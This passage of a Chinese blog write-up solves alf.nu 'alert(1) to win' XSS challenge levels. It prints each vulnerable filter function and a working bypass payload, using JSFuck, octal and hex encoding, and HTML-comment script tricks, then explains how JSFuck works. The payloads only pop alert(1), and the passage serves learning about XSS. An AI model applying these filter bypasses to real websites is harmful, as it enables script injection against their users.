!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()//</span><br></pre></td></tr></table></figure>
<p>or 自己筛选字符。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_=!1+URL+!0</span><br></pre></td></tr></table></figure>
<p>在chrome浏览器下，返回的字符串为 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">falsefunction URL() &#123; [native code] &#125;true</span><br></pre></td></tr></table></figure></p>
<p>那么变量 <code>_</code> 即为 字符串
<code>falsefunction URL() &#123; [native code] &#125;true</code> 。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fill           =&gt;    _[0]+_[10]+_[2]+_[2]</span><br><span class="line">constructor    =&gt;    _[8]+_[11]+_[7]+_[3]+_[9]+_[38]+_[39]+_[8]+_[9]+_[11]+_[38]</span><br><span class="line">alert          =&gt;    _[1]+_[2]+_[4]+_[38]+_[9]</span><br></pre></td></tr></table></figure>
<p>只需要在JS中执行 <code>[]["fill"]["constructor"]("alert(1)")()</code>
即可。</p>
<p>其对应的JSfuck代码为： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_=!1+URL+!0,[][_[0]+_[10]+_[2]+_[2]][_[8]+_[11]+_[7]+_[3]+_[9]+_[38]+_[39]+_[8]+_[9]+_[11]+_[38]](_[1]+_[2]+_[4]+_[38]+_[9]+&#x27;(1)&#x27;)()</span><br></pre></td></tr></table></figure> 最终的结果为 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);_=!1+URL+!0,[][_[0]+_[10]+_[2]+_[2]][_[8]+_[11]+_[7]+_[3]+_[9]+_[38]+_[39]+_[8]+_[9]+_[11]+_[38]](_[1]+_[2]+_[4]+_[38]+_[9]+&#x27;(1)&#x27;)()//</span><br></pre></td></tr></table></figure></p>
<p>还可以转换成8进制，这样不含有像十六进制字符 <code>x</code> 。
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);[][&#x27;\160\157\160&#x27;][&#x27;\143\157\156\163\164\162\165\143\164\157\162&#x27;](&#x27;\141\154\145\162\164(1)&#x27;)()//</span><br></pre></td></tr></table></figure></p>
<h2 id="iframe">iframe</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  var tag = document.createElement(&#x27;iframe&#x27;);</span><br><span class="line"></span><br><span class="line">  // For this one, you get to run any code you want, but in a &quot;sandboxed&quot; iframe.</span><br><span class="line">  //</span><br><span class="line">  // https://4i.am/?...raw=... just outputs whatever you pass in.</span><br><span class="line">  //</span><br><span class="line">  // Alerting from 4i.am won&#x27;t count.</span><br><span class="line"></span><br><span class="line">  s = &#x27;&lt;script&gt;&#x27; + s + &#x27;&lt;\/script&gt;&#x27;;</span><br><span class="line">  tag.src = &#x27;https://4i.am/?:XSS=0&amp;CT=text/html&amp;raw=&#x27; + encodeURIComponent(s);</span><br><span class="line"></span><br><span class="line">  window.WINNING = function() &#123; youWon = true; &#125;;</span><br><span class="line"></span><br><span class="line">  tag.setAttribute(&#x27;onload&#x27;, &#x27;youWon &amp;&amp; alert(1)&#x27;);</span><br><span class="line">  return tag.outerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>encodeURIComponent() 函数可把字符串作为 URI 组件进行编码。 如：
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">document.write(encodeURIComponent(&quot;http://www.w3school.com.cn&quot;))</span><br><span class="line">document.write(&quot;&lt;br /&gt;&quot;)</span><br><span class="line"></span><br><span class="line">document.write(encodeURIComponent(&quot;,/?:@&amp;=+$#&quot;))</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure> 输出： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http%3A%2F%2Fwww.w3school.com.cn</span><br><span class="line">%2C%2F%3F%3A%40%26%3D%2B%24%23</span><br></pre></td></tr></table></figure></p>
<p>iframe是html的一个标签，可以在网页中创建内联框架，有个src属性（指向文件地址，html、php等）可以选择内联框架的内容。<code>window.name</code>（一般在js代码里出现）的值不是一个普通的全局变量，而是当前窗口的名字，这里要注意的是每个iframe都有包裹它的window，而这个window是top
window的子窗口，而它自然也有window.name的属性，window.name属性的神奇之处在于name
值在不同的页面（甚至不同域名）加载后依旧存在（如果没修改则值不会变化），并且可以支持非常长的
name 值（2MB）。</p>
<p>这个题目就是需要使用html的编码方法来完成任务。
本题的解决思路要利用到iframe的特性，当在iframe中设置了一个name属性之后，
这个name属性的值就会变成iframe中的window对象的全局。现在有意思的地方在于，iframe可以定义自己的window.name对象，当windowa.name不存在的同时注入了一个新的name的时候。所以我们需要做的就是干扰iframe使它认为window.name的指就是
<code>youWon</code>，那么这个时候 <code>alert(1)</code>
就可以被触发。</p>
<p>那个网址
<code>https://4i.am/?...raw=... just outputs whatever you pass in.</code>
直接返回js，那么可以由此设置iframe的name属性。</p>
<p>最终的解决方法是：</p>
<p><code>name='youWon'</code></p>
<p><a
target="_blank" rel="noopener" href="https://www.cnblogs.com/zichi/p/4620656.html">利用window.name+iframe跨域获取数据详解</a></p>
<h2 id="tism">TI(S)M</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  function json(s) &#123; return JSON.stringify(s).replace(/\//g, &#x27;\\/&#x27;); &#125;</span><br><span class="line">  function html(s) &#123; return s.replace(/[&lt;&gt;&quot;&amp;]/g, function(s) &#123;</span><br><span class="line">                        return &#x27;&amp;#&#x27; + s.charCodeAt(0) + &#x27;;&#x27;; &#125;); &#125;</span><br><span class="line"></span><br><span class="line">  return (</span><br><span class="line">    &#x27;&lt;script&gt;&#x27; +</span><br><span class="line">      &#x27;var url = &#x27; + json(s) + &#x27;; // We\&#x27;ll use this later &#x27; +</span><br><span class="line">    &#x27;&lt;/script&gt;\n\n&#x27; +</span><br><span class="line">    &#x27;  &lt;!-- for debugging --&gt;\n&#x27; +</span><br><span class="line">    &#x27;  URL: &#x27; + html(s) + &#x27;\n\n&#x27; +</span><br><span class="line">    &#x27;&lt;!-- then suddenly --&gt;\n&#x27; +</span><br><span class="line">    &#x27;&lt;script&gt;\n&#x27; +</span><br><span class="line">    &#x27;  if (!/^http:.*/.test(url)) console.log(&quot;Bad url: &quot; + url);\n&#x27; +</span><br><span class="line">    &#x27;  else new Image().src = url;\n&#x27; +</span><br><span class="line">    &#x27;&lt;/script&gt;&#x27;</span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在html5中如果是 <code>&lt;!–-&lt;script&gt;</code>
中的代码都会认为是JavaScript的代码，直到遇到了 <code>--&gt;</code>
的结束标识符。</p>
<h2 id="json-3">JSON 3</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  return s.split(&#x27;#&#x27;).map(function(v) &#123;</span><br><span class="line">      // Only 20% of slashes are end tags; save 1.2% of total</span><br><span class="line">      // bytes by only escaping those.</span><br><span class="line">      var json = JSON.stringify(v).replace(/&lt;\//g, &#x27;&lt;\\/&#x27;);</span><br><span class="line">      return &#x27;&lt;script&gt;console.log(&#x27;+json+&#x27;)&lt;/script&gt;&#x27;;</span><br><span class="line">      &#125;).join(&#x27;&#x27;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们需要填写的字符串的格式是payload#payload的格式。那么最后将会被渲染为：
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(&quot;payload1&quot;)&lt;/script&gt;&lt;script&gt;console.log(&quot;payload2&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>这道题目同样是需要用到和 <code>TI(S)M</code>
题中一样的html5放入特性。即在html5中，<code>&lt;!–&lt;script&gt;</code>
中的代码全部会被认为是JavaScript的代码，直到遇到了 <code>--&gt;</code>
的结束标识符。</p>
<p>我们输入<code>&lt;!--&lt;script&gt;#payload2</code></p>
<p>得到： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(&quot;&lt;!--&lt;script&gt;&quot;)&lt;/script&gt;&lt;script&gt;console.log(&quot;payload2&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>由于 <code>&lt;!–-&lt;script&gt;</code>
中的代码都会认为是JavaScript的代码，所以可以将<code>&lt;/</code>的意义转变，变成
逻辑小于号和正则表达式。 需要在 <code>payload2</code>
中闭合正则表达式，并注意将里面的 <code>(</code> 转义或者
将其闭合，正则表达式中的 <code>()</code> <code>[]</code>
<code>&#123;&#125;</code>有不同的意思。 <code>()</code>
是为了提取匹配的字符串。表达式中有几个 <code>()</code>
就有几个相应的匹配字符串。否则报错 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Error: Uncaught SyntaxError: Invalid regular expression: /script&gt;&lt;script&gt;console.log(&quot;/: Unterminated group</span><br></pre></td></tr></table></figure> 简化下：
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">console.log(&quot;&lt;!--&lt;script&gt;&quot;)   &lt;        /script&gt;&lt;script&gt;console.log(&quot;)/;       alert(1)</span><br><span class="line">也就是</span><br><span class="line">console()    小于号    /正则表达式/ ;  alert(1)</span><br></pre></td></tr></table></figure> 还要注意在 js中将 <code>--&gt;</code> 放在注释里面。</p>
<p>payload: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--&lt;script&gt;#)/;alert(1)//--&gt;</span><br></pre></td></tr></table></figure> ## K'Z'K <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">// submitted by Stephen Leppik</span><br><span class="line">function escape(s) &#123;</span><br><span class="line">    // remove vowels in honor of K&#x27;Z&#x27;K the Destroyer</span><br><span class="line">    s = s.replace(/[aeiouy]/gi, &#x27;&#x27;);</span><br><span class="line">    return &#x27;&lt;script&gt;console.log(&quot;&#x27; + s + &#x27;&quot;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>此题替换所有的<code>aeiouy</code>，可以使用匿名函数，将其中的替换成十六进制或者8进制即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;pop&quot;][&quot;constructor&quot;](&#x27;alert(1)&#x27;)()</span><br></pre></td></tr></table></figure>
<p>十进制 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; (ord(&#x27;o&#x27;))</span><br><span class="line">111</span><br><span class="line">&gt;&gt;&gt; (ord(&#x27;u&#x27;))</span><br><span class="line">117</span><br><span class="line">&gt;&gt;&gt; (ord(&#x27;a&#x27;))</span><br><span class="line">97</span><br><span class="line">&gt;&gt;&gt; (ord(&#x27;e&#x27;))</span><br><span class="line">101</span><br></pre></td></tr></table></figure></p>
<p>十六进制 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hex(ord(&#x27;o&#x27;)) 	&#x27;0x6f&#x27;</span><br><span class="line">hex(ord(&#x27;u&#x27;)) &#x27;0x75&#x27;</span><br><span class="line">hex(ord(&#x27;a&#x27;)) &#x27;0x61&#x27;</span><br><span class="line">hex(ord(&#x27;e&#x27;)) &#x27;0x65&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure> 即 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;p\x6fp&quot;][&quot;c\x6fnstr\x75ct\x6fr&quot;](&#x27;\x61l\x65rt(1)&#x27;)()</span><br></pre></td></tr></table></figure> 八进制： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">oct(ord(&#x27;o&#x27;)) &#x27;0157&#x27;</span><br><span class="line">oct(ord(&#x27;u&#x27;)) &#x27;0165&#x27;</span><br><span class="line">oct(ord(&#x27;a&#x27;)) &#x27;0141&#x27;</span><br><span class="line">oct(ord(&#x27;e&#x27;)) &#x27;0145&#x27;</span><br></pre></td></tr></table></figure> 即
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;p\157p&quot;][&quot;c\157nstr\165ct\157r&quot;](&#x27;\141l\145rt(1)&#x27;)()</span><br></pre></td></tr></table></figure> 最终的payload为： <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);[][&quot;p\157p&quot;][&quot;c\157nstr\165ct\157r&quot;](&#x27;\141l\145rt(1)&#x27;)();//</span><br></pre></td></tr></table></figure></p>
<h2 id="kzk">K'Z'K</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// submitted by Stephen Leppik</span><br><span class="line">function escape(s) &#123;</span><br><span class="line">    // remove vowels and escape sequences in honor of K&#x27;Z&#x27;K </span><br><span class="line">    // y is only sometimes a vowel, so it&#x27;s only removed as a literal</span><br><span class="line">    s = s.replace(/[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi, &#x27;&#x27;)</span><br><span class="line">    // remove certain characters that can be used to get vowels</span><br><span class="line">    s = s.replace(/[&#123;&#125;!=&lt;&gt;]/g, &#x27;&#x27;);</span><br><span class="line">    return &#x27;&lt;script&gt;console.log(&quot;&#x27; + s + &#x27;&quot;);&lt;/script&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>貌似这道题把这几个字母的字符，十进制，十六进制，八进制都给过滤掉了，还过滤了其他字符。
但是由于替换掉的字符为空，我们可以利用多字符拼接，把目标字符保留下来。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);[][&quot;p\1\15757p&quot;][&quot;c\157nstr\165ct\157r&quot;](&#x27;\141l\145rt(1)&#x27;)();//</span><br></pre></td></tr></table></figure>
<p>payload: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);[][&quot;p\1\15757p&quot;][&quot;c\1\15757nstr\1\16565ct\1\15757r&quot;](&#x27;\1\14141l\1\14545rt(1)&#x27;)();//</span><br></pre></td></tr></table></figure> # 问题总结</p>
<p>什么时候加 【;】</p>
<h1 id="知识补给">知识补给</h1>
<h2 id="js">JS</h2>
<p>学习 <code>[</code> , <code>]</code> , <code>(</code> ,
<code>)</code> , <code>!</code> 和 <code>+</code>
的其他用法，首先需要记住以下几点：</p>
<ul>
<li>用 <code>!</code> 开头会转换成 <code>Boolean 布尔值</code></li>
<li>用 <code>+</code> 开头会转换成 <code>Number 数值类型</code></li>
<li>添加 <code>[]</code> 会转换成 <code>String 字符串</code></li>
<li><code>![] === false</code> 、 <code>+[] === 0</code> 、
<code>[]+[] === ""</code></li>
</ul>
<p>另外可以通过 <code>[]</code> 获取字符串中特定的字符
<code>"hello"[0] === "h"</code></p>
<p>也可以把数字串起来后再转换回数值：
<code>+("1" + "1") === 11</code></p>
<p>好了, 来看看用这六个字符怎么可以得到一个字母a: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">![] === false</span><br><span class="line">![] + [] === &quot;false&quot;</span><br><span class="line">// ---------------</span><br><span class="line">!![] === true</span><br><span class="line">+!![] === 1</span><br><span class="line">// ---------------</span><br><span class="line">(![] + [])[+!![]] === &#x27;a&#x27;</span><br></pre></td></tr></table></figure>
用这个技巧我们可以轻易把 <code>true</code> 和 <code>false</code>
中所有字母都取出来: <code>a,e,f,l,r,s,t,u</code>。</p>
<p>还有什么其他可用的吗？ <code>undefined !</code></p>
<p>undefined 我们可以通过 <code>[][[]]</code> 得出来。
<code>[][[]] + [] === "undefined"</code> 这样我们可以额外得到d,i和n
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">([][[]] + [])[+!![]] === &#x27;n&#x27;</span><br><span class="line">([][[]] + [])[+!![]+!![]] === &#x27;d&#x27;</span><br></pre></td></tr></table></figure></p>
<p>利用目前我们得到的这些字母，我们可以拼出 <code>fill</code>,
<code>filter</code> 和 <code>find</code>。
当然还可以拼出其他单词，但这三个单词都是数组的方法！</p>
<p>还有一件事我们需要知道的是，对象的属性我们都可以通过 <code>[]</code>
获取到。 <code>[2,1]["fill"]()</code> 和 <code>[2,1].fill()</code>
是一样的！</p>
<p><code>[]["fill"]</code> 返回
<code>function fill() &#123; [native code] &#125;</code> , 利用添加
<code>[]</code> 会转换成 <code>String</code> 的规则我们得到:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;fill&quot;]+[] === &quot;function fill() &#123; [native code] &#125;&quot;</span><br></pre></td></tr></table></figure> 这样一来我们又获得了:
<code>c,o,v,(,),&#123;,[,],&#125;</code>。</p>
<p>进而我们可以得到 <code>constructor</code> 。</p>
<p>利用 <code>constructor</code> 函数可以返回对象的构造方法:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">true[&quot;constructor&quot;] + [] === &quot;function Boolean() &#123; [native code] &#125;&quot;</span><br><span class="line">0[&quot;constructor&quot;] + []    === &quot;function Number() &#123; [native code] &#125;&quot;</span><br><span class="line">&quot;&quot;[&quot;constructor&quot;] + []   === &quot;function String() &#123; [native code] &#125;&quot;</span><br><span class="line">[][&quot;constructor&quot;] + []   === &quot;function Array() &#123; [native code] &#125;&quot;</span><br></pre></td></tr></table></figure> <code>B,N,S,A,m,g,y</code> 又收入囊中.</p>
<p>现在我们可以得到 <code>toString</code> 了:</p>
<p><code>(10)["toString"] () === "10"</code>
嗯，虽然我们现在可以把任何东西都转换成字符串了，但是有个什么鸟用呢？</p>
<p>你有所不知的是，toString 有一个神秘的raidx
参数，可以指定用于数字到字符串的转换的基数。 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">(12)[&quot;toString&quot;](10) === &quot;12&quot; // base 10 - normal to us</span><br><span class="line">(12)[&quot;toString&quot;](2) === &quot;1100&quot; // base 2, or binary, for 12</span><br><span class="line">(12)[&quot;toString&quot;](8) === &quot;14&quot; // base 8 (octonary) for 12</span><br><span class="line">(12)[&quot;toString&quot;](16) === &quot;c&quot; // hex for 12</span><br></pre></td></tr></table></figure>
利用这个方法，我们可以得到所有字符了. 0-9, a-z: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(10)[&quot;toString&quot;](36) === &quot;a&quot;</span><br><span class="line">(35)[&quot;toString&quot;](36) === &quot;z&quot;</span><br></pre></td></tr></table></figure>
利用一些过期的现在已不推荐使用的<a
target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/tag/HTML%20wrapper%20methods">HTML
wrapper methods</a>，我们可以得到另外一些标点符号: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;test&quot;&quot;bold&quot; === &quot;&lt;b&gt;test&lt;/b&gt;&quot;</span><br></pre></td></tr></table></figure>
上面得到了&lt;,&gt;和/.</p>
<p>现在我们还差大写字母.</p>
<p>或许你听说过escape函数。
<code>escape()</code>函数可对字符串进行编码，这样就可以在所有的计算机上读取该字符串。escape函数是我们成败的至关重要的一环！</p>
<p>现在我们可以拼写出escape但是我们怎么样可以执行呢,
escape可是属于全局对象的！</p>
<p>问题来了，任何函数的构造函数是什么呢？</p>
<p>答案是：<code>function Function() &#123; [native code] &#125;</code>, Function
对象本身。 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;fill&quot;][&quot;constructor&quot;] === Function</span><br></pre></td></tr></table></figure>
利用Function对象，我们可以把字符串作为参数然后去创建一个函数:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Function(&quot;alert(&#x27;test&#x27;)&quot;)</span><br></pre></td></tr></table></figure> 我们只需要在最后添加()就可以执行 alert
了，所以我们可以这样使用escape函数: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;fill&quot;][&quot;constructor&quot;](&quot;return escape(&#x27; &#x27;)&quot;)() === &quot;%20&quot;</span><br></pre></td></tr></table></figure> 如果我们把
<code>&lt;</code> 穿入escape会返回 <code>%3C</code>。
C对于我们得到剩下的字母非常重要: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][&quot;fill&quot;][&quot;constructor&quot;](&quot;return escape(&#x27;&lt;&#x27;)&quot;)()[2] === &quot;C&quot;</span><br></pre></td></tr></table></figure> 用了C, 我们就可以用
<code>fromCharCode</code> 函数了 <code>!fromCharCode()</code>
可接受一个指定的 Unicode 值，然后返回一个字符串。
<code>fromCharCode</code> 是 <code>String</code>
对象的方法，因此可以这样调用: <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;[&quot;constructor&quot;][&quot;fromCharCode&quot;](65) === &quot;A&quot;</span><br><span class="line">&quot;&quot;[&quot;constructor&quot;][&quot;fromCharCode&quot;](46) === &quot;.&quot;</span><br></pre></td></tr></table></figure> 至此为止，利用<a
target="_blank" rel="noopener" href="http://unicodelookup.com">Unicode对照表</a>我们可以得到任何字符了！
这就是JSFUCK的原理。更具体地参见<a
target="_blank" rel="noopener" href="https://github.com/aemkei/jsfuck#basics">这里</a>，嘿嘿。</p>
<p>我的答题：</p>
<p><a target="_blank" rel="noopener" href="https://alf.nu/alert(1)#accesstoken=hu1CraLkoNlT87K1BlhV"
class="uri">https://alf.nu/alert(1)#accesstoken=hu1CraLkoNlT87K1BlhV</a></p>
<h1 id="参考">参考</h1>
<p><a
target="_blank" rel="noopener" href="https://blog.csdn.net/he_and/article/details/79672900">alf.nu/alert1
writeup(1-7)</a> <a
target="_blank" rel="noopener" href="https://blog.csdn.net/u012763794/article/details/51526725">escape.alf.nu
XSS Challenges 8-15 之进阶的XSS</a> <a
target="_blank" rel="noopener" href="https://blog.csdn.net/taozijun/article/details/81004359">XSS练习平台【a/lert(1)
to win】</a> <a
target="_blank" rel="noopener" href="https://github.com/masazumi-github/alert-1-to-win#a020">alert(1)
to win payloads</a> <a
target="_blank" rel="noopener" href="https://xinranliu.me/2016-10-14-six-characters-in-js/">6个字符搞定一切</a>
<a
target="_blank" rel="noopener" href="https://rstforums.com/forum/topic/74310-escapealfnu-xss-challenges-write-ups-part-2/">escape.alf.nu
XSS Challenges Write-ups (Part 2)</a> <a
target="_blank" rel="noopener" href="https://github.com/evilddog/hexo_blog_backup/blob/master/source/_posts/escape-alf-nu-write-ups-2.md">escape-Write-ups
(Part 2)</a> <a
target="_blank" rel="noopener" href="https://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html">Ye
Olde Crockford JSON regexp is Bypassable</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/xss/" rel="tag"># xss</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2018/08/21/%E8%A7%A3%E5%86%B3ubuntu%E5%8D%87%E7%BA%A7%E5%A4%B1%E8%B4%A5%E6%97%A0%E6%B3%95%E7%99%BB%E5%BD%95%E7%B3%BB%E7%BB%9F/" rel="prev" title="解决ubuntu升级失败无法登录系统">
                  <i class="fa fa-angle-left"></i> 解决ubuntu升级失败无法登录系统
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2018/10/19/CUDA-kernel%E4%B9%8B%E5%A4%9A%E8%BF%9B%E7%A8%8B%E8%AE%BF%E9%97%AE%E7%A0%94%E7%A9%B6/" rel="next" title="CUDA kernel之多进程访问研究">
                  CUDA kernel之多进程访问研究 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Max</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->



</body>
</html>
